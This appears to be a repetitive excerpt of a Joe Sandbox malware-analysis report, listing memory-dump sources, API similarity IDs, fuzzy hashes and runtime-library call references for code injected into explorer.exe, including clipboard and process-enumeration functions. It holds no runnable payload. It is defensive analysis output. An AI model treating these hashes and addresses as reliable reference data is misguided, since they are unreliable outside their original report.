                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarnstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                  • API String ID: 409252694-1405518554
                                                                                                                                                                                                                                  • Opcode ID: 0a105885c8180c4e6dacf1720721d54cfb435c94c5031aeba66c4ec3d3046334
                                                                                                                                                                                                                                  • Instruction ID: af5a8d91c99fd0cd28f1c5125c09b0364f458fbc1cdbad23dbee26c50e254b4a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a105885c8180c4e6dacf1720721d54cfb435c94c5031aeba66c4ec3d3046334
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CF0A2AE31098850CB14EF25D8511BC5326FBE0BC4FD48021AB6D4B568EE3CD99DC741
                                                                                                                                                                                                                                  Function 0E0FBD3C Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2998201375-0
                                                                                                                                                                                                                                  • Opcode ID: e13f371260ad2e45ce3e96b535d2fff96f86f4b64d39fc1f6ca56abf7e9bdf8f
                                                                                                                                                                                                                                  • Instruction ID: f76bd6fa582963c4e58cd76dd674f18cf96fbaac00adc769bc7b1e9a7d4560c8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e13f371260ad2e45ce3e96b535d2fff96f86f4b64d39fc1f6ca56abf7e9bdf8f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F31B332315781C6DB608F15E590369BBA5FB84FD4F284226EB9957F68DB38C861CF00
                                                                                                                                                                                                                                  Function 0DF4BD3C Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2998201375-0
                                                                                                                                                                                                                                  • Opcode ID: e13f371260ad2e45ce3e96b535d2fff96f86f4b64d39fc1f6ca56abf7e9bdf8f
                                                                                                                                                                                                                                  • Instruction ID: 2fecf741738657a5d7b8b7183490e16cd497f41a7afb169d095d665c1109fa03
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e13f371260ad2e45ce3e96b535d2fff96f86f4b64d39fc1f6ca56abf7e9bdf8f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5318E72618781C6DB208F29E58077ABFB5FB85FD4F19C126EB8957B6ADB38C4418700
                                                                                                                                                                                                                                  Function 1021BD3C Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2998201375-0
                                                                                                                                                                                                                                  • Opcode ID: e13f371260ad2e45ce3e96b535d2fff96f86f4b64d39fc1f6ca56abf7e9bdf8f
                                                                                                                                                                                                                                  • Instruction ID: 035f7601c1568d16a62cb4e3fa8129e088d46b533bfd86b455cd275328e0a1bc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e13f371260ad2e45ce3e96b535d2fff96f86f4b64d39fc1f6ca56abf7e9bdf8f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3531C236214781C6D755CF25E1807A9BBB5FB84FC4F254126EB885BB69DB38C8A1CB00
                                                                                                                                                                                                                                  Function 0E0E9EA0 Relevance: 7.6, APIs: 5, Instructions: 57processCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3721439000-0
                                                                                                                                                                                                                                  • Opcode ID: 09e9fd014ecaad60baa62fbe240b46a2e6e0872ee412f7ebd71e4c3451ce10d3
                                                                                                                                                                                                                                  • Instruction ID: be9a68726703d598839b7057e34138ccee7d2a5c425e2e6df52d154c3298ee38
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09e9fd014ecaad60baa62fbe240b46a2e6e0872ee412f7ebd71e4c3451ce10d3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B11C3722146854ADA64EB25E5943AAB3A5F7C53D4FC40A31DA9D43F9CDF6CCD04CB00
                                                                                                                                                                                                                                  Function 0DF39EA0 Relevance: 7.6, APIs: 5, Instructions: 57processCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3721439000-0
                                                                                                                                                                                                                                  • Opcode ID: 5234a5cb9d4af242c6d48e2eff22f77f773641afb7f067bc0787645928691682
                                                                                                                                                                                                                                  • Instruction ID: f34d0a88319072876ffaa5940fba5ab6ffd2cdff9b79501487cafe8c2e5e63df
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5234a5cb9d4af242c6d48e2eff22f77f773641afb7f067bc0787645928691682
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B711872231868453DB20EB29E89437A7365FBC57D4F96C221DB9D47798DFACC905CB10
                                                                                                                                                                                                                                  Function 10209EA0 Relevance: 7.6, APIs: 5, Instructions: 57processCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3721439000-0
                                                                                                                                                                                                                                  • Opcode ID: 09e9fd014ecaad60baa62fbe240b46a2e6e0872ee412f7ebd71e4c3451ce10d3
                                                                                                                                                                                                                                  • Instruction ID: c4d5f38768df4887838eebe1d8542e91e36483dd728475b5ae6cb5b5e1d1bc04
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09e9fd014ecaad60baa62fbe240b46a2e6e0872ee412f7ebd71e4c3451ce10d3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3711D52631478542DB20CF25E49536AA369F7C93D4F944221EBAE83A9CEF7CD518CF00
                                                                                                                                                                                                                                  Function 0E0E7960 Relevance: 7.5, APIs: 5, Instructions: 42clipboardCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1006321803-0
                                                                                                                                                                                                                                  • Opcode ID: 3f6fdb9662fdaab80e8b146d8066cb7615450abca20b9742a7ef6fa3840ebc62
                                                                                                                                                                                                                                  • Instruction ID: 0f38adf9947209e5879d8785939486a2faae7a401c8b0a016201f45345346f3c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f6fdb9662fdaab80e8b146d8066cb7615450abca20b9742a7ef6fa3840ebc62
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9018B31719B8182EE599B26F95436963A1AB88FC0F0C5875DE6A07F64DF3CC896C700
                                                                                                                                                                                                                                  Function 10207960 Relevance: 7.5, APIs: 5, Instructions: 42clipboardCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1006321803-0
                                                                                                                                                                                                                                  • Opcode ID: 3f6fdb9662fdaab80e8b146d8066cb7615450abca20b9742a7ef6fa3840ebc62
                                                                                                                                                                                                                                  • Instruction ID: 630108ad106788ce71fb28f065c6d833ede5d852d9a3c62a0da59da2e8dc941e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f6fdb9662fdaab80e8b146d8066cb7615450abca20b9742a7ef6fa3840ebc62
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A017C31719B4582EF498F26B9483696361FB89FC0F085034DEAA0B758DF3CD4998700
                                                                                                                                                                                                                                  Function 08A1C151 Relevance: 7.5, APIs: 5, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2542811309.0000000008A00000.00000040.00000001.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_8a00000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3003190580-0
                                                                                                                                                                                                                                  • Opcode ID: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                                  • Instruction ID: 7450bfc45edafd09cf304effeea905b76f61c3c82ef694a24ebc24c0d60c0dcd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BF0AE34198A199FCFE4FF6CD5C1B69B3A5FB9C221F44456CD44CC7706D93098404751
                                                                                                                                                                                                                                  Function 0AE4C151 Relevance: 7.5, APIs: 5, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2548665098.000000000AE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0AE30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_ae30000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3003190580-0
                                                                                                                                                                                                                                  • Opcode ID: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                                  • Instruction ID: f040678abc62ab42b8efce1b30f3344cb67265255c77396e2263b04b082f561a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42F05E3412990A9EDBA4FF6CE0C1A6963A9FBDC600F5965A8D44CC7307DA2098808B61
                                                                                                                                                                                                                                  Function 0B30C151 Relevance: 7.5, APIs: 5, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2549414053.000000000B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b2f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3003190580-0
                                                                                                                                                                                                                                  • Opcode ID: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                                  • Instruction ID: bfc32cf657d59feed29acc865b2081114347a1b57db399aee11b632602f4f8b3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6F03735138D0A9FCBACFB68D0D6A6973A8FF4C600FE997A8D14DC7286DE3098408751
                                                                                                                                                                                                                                  Function 0E0EC81C Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0E0EC829
                                                                                                                                                                                                                                    • Part of subcall function 0E0EF930: _getptd_noexit.LIBCMT ref: 0E0EF936
                                                                                                                                                                                                                                    • Part of subcall function 0E0EF930: _amsg_exit.LIBCMT ref: 0E0EF946
                                                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 0E0EC837
                                                                                                                                                                                                                                    • Part of subcall function 0E0F2214: DecodePointer.KERNEL32 ref: 0E0F221F
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0E0EC83C
                                                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 0E0EC858
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0E0EC868
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3669027769-0
                                                                                                                                                                                                                                  • Opcode ID: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                                  • Instruction ID: 2ff4d643fd4713e13fa414e8a78a69d8e92c6ad0c21adf92af6f0670f32b4733
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25E030323126C1D9DE556B66E3801EDA2A1E788F84F4D8531CBC90BB15DE21CCA1C390
                                                                                                                                                                                                                                  Function 0DF3C81C Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0DF3C829
                                                                                                                                                                                                                                    • Part of subcall function 0DF3F930: _getptd_noexit.LIBCMT ref: 0DF3F936
                                                                                                                                                                                                                                    • Part of subcall function 0DF3F930: _amsg_exit.LIBCMT ref: 0DF3F946
                                                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 0DF3C837
                                                                                                                                                                                                                                    • Part of subcall function 0DF42214: DecodePointer.KERNEL32 ref: 0DF4221F
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0DF3C83C
                                                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 0DF3C858
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0DF3C868
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3669027769-0
                                                                                                                                                                                                                                  • Opcode ID: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                                  • Instruction ID: 5efc8bebc6a3f67c67165b44371b662ba4a9b6062ff16a6764b15e59319d809a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FE06523A1958092CE15AF6DE5401BD7760EF48F88F4FC136DBC91B215DE30C991C350
                                                                                                                                                                                                                                  Function 1020C81C Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 1020C829
                                                                                                                                                                                                                                    • Part of subcall function 1020F930: _getptd_noexit.LIBCMT ref: 1020F936
                                                                                                                                                                                                                                    • Part of subcall function 1020F930: _amsg_exit.LIBCMT ref: 1020F946
                                                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 1020C837
                                                                                                                                                                                                                                    • Part of subcall function 10212214: DecodePointer.KERNEL32 ref: 1021221F
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 1020C83C
                                                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 1020C858
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 1020C868
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3669027769-0
                                                                                                                                                                                                                                  • Opcode ID: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                                  • Instruction ID: c82b839e0c854c34302ffcd5ccff41e35805ebb939d23aaaeb4c653a2d2fb919
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21E0657626078991CF46DF61E1816AD6360E749FC4F2DC131EB880B60DDE30D8B1C754
                                                                                                                                                                                                                                  Function 08A27741 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 08A2775A
                                                                                                                                                                                                                                    • Part of subcall function 08A1F4DD: _getptd_noexit.LIBCMT ref: 08A1F4E1
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 08A27766
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 08A2778D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2542811309.0000000008A00000.00000040.00000001.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_8a00000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$_getptd_noexit_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: 1
                                                                                                                                                                                                                                  • API String ID: 28428206-2212294583
                                                                                                                                                                                                                                  • Opcode ID: 15a9780020d5f1d50c68b03fcb33533110226140a65e0ddf9756409dcc418be2
                                                                                                                                                                                                                                  • Instruction ID: 30fdb8e0d99cbec2f98de097accad8ec9e425aac50e6ef6c7d068efa2bb42e57
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15a9780020d5f1d50c68b03fcb33533110226140a65e0ddf9756409dcc418be2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7321293461EAE8CEE73B673C48843353AD6EB5B607F1840FDC486CBE16D965CA428351
                                                                                                                                                                                                                                  Function 0AE57741 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0AE5775A
                                                                                                                                                                                                                                    • Part of subcall function 0AE4F4DD: _getptd_noexit.LIBCMT ref: 0AE4F4E1
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0AE57766
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0AE5778D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2548665098.000000000AE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0AE30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_ae30000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$_getptd_noexit_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: 1
                                                                                                                                                                                                                                  • API String ID: 28428206-2212294583
                                                                                                                                                                                                                                  • Opcode ID: 15a9780020d5f1d50c68b03fcb33533110226140a65e0ddf9756409dcc418be2
                                                                                                                                                                                                                                  • Instruction ID: bfb48ac71409995453422939bd43b662a7087a7f2b619fa2872761d70b89ec61
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15a9780020d5f1d50c68b03fcb33533110226140a65e0ddf9756409dcc418be2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68212C2062CEC84FE32A6B3874843363ED9EB5B10AF1964E9CC86CB217D95589128711
                                                                                                                                                                                                                                  Function 0B317741 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0B31775A
                                                                                                                                                                                                                                    • Part of subcall function 0B30F4DD: _getptd_noexit.LIBCMT ref: 0B30F4E1
